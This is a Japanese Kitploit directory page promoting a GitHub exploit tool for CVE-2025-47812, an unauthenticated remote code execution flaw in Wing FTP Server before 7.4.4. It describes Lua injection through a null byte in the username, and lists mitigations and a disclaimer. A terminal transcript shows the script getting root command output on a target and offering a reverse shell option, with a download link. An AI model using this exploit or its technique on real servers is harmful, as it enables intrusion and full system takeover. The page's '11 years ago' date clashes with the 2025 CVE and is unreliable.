Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
ツール/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツールペイロード開発
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ CVE-2025-47812 – Wing FTP Server の重大な RCE 🛡️

🔎 概要:

CVE-2025-47812 は、Wing FTP Server バージョン 7.4.4 より前のバージョンに影響を与える 重大なリモートコード実行 (RCE) 脆弱性です。セキュリティ研究者によって発見され、実際に活発に悪用されている ことが確認されています。


🧱 根本原因:

この脆弱性は、Wing FTP Server の 認証ロジック、特に username パラメータ内の ヌルバイト (\0) の処理方法に起因します。

攻撃者はユーザー名フィールドを介して 任意の Lua コード を注入でき、サーバーはそれをセッションファイルに書き込みます。その後、このセッションファイルが処理されると、注入された Lua コードが実行され、攻撃者はシステムレベルのコマンドを実行できるようになります。


🚨 影響:

  • 深刻度: CVSS スコア 10.0 (重大)
  • 必要なアクセス: 認証なしまたは匿名アクセスで十分
  • 悪用状況: 実際に活発に悪用されていることが確認済み
  • 取得される権限: コードは SYSTEM (Windows) または root (Linux/macOS) として実行
  • 影響を受けるプラットフォーム: Windows、Linux、macOS

🔧 緩和策:

  • 直ちにアップデート して Wing FTP Server バージョン 7.4.4 以降に更新してください。
  • 公開 FTP サーバー が /loginok.html を信頼できないネットワークに公開していないことを確認してください。
  • ログで異常なユーザー名や Lua コードの注入がないか監視してください。
  • ネットワークセグメンテーション を実装して、FTP サービスを内部インフラストラクチャから分離してください。

💀 エクスプロイト:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
   CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>


------ Response End ------

⚠️ 免責事項

このエクスプロイトは教育目的のみで提供されています。 責任を持って、テストする明示的な許可を得たシステムでのみ使用してください。 作者は、このツールの誤用やそれによって生じた損害について一切の責任を負いません。

ツールをダウンロード